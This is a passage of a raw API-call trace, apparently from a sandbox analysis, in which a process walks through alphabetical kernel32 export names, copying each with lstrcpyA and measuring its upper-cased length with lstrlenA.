returned 29 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.221] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.222] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.222] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.222] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.222] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.222] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.222] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.222] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.222] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.222] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.222] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.222] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.222] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.222] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.222] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.222] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.222] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.222] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.222] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.222] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.223] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.223] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.223] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.223] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.223] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.223] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.223] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.223] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.223] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.223] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.223] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.223] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.223] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.223] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.223] lstrlenA (lpString="BEEP") returned 4 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.223] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.223] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.223] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.223] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.223] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.224] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.224] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.224] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.224] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.224] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.224] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.224] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.224] lstrlenA (lpString="CANCELIO") returned 8 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.224] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.224] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.224] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.224] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.224] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.224] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.224] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.224] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.224] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.224] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.224] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.225] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.225] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.225] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.225] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.225] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.225] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.225] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.225] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.225] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.225] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.225] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.225] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.225] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.226] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.226] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.226] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.226] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.226] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.226] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.226] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.226] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.226] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.226] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.226] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.226] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.226] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.226] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.226] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.226] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.226] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.226] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.226] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.226] lstrlenA (lpString="COPYFILEA") returned 9 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.227] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.227] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.227] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.227] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.227] lstrlenA (lpString="COPYFILEW") returned 9 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.227] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.227] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.227] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.227] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.227] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.227] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.227] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.227] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.227] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.227] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.227] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.227] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.227] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.228] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.228] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.228] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.228] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.228] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.228] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.228] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.228] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.228] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.228] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.228] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.228] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.228] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.228] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.228] 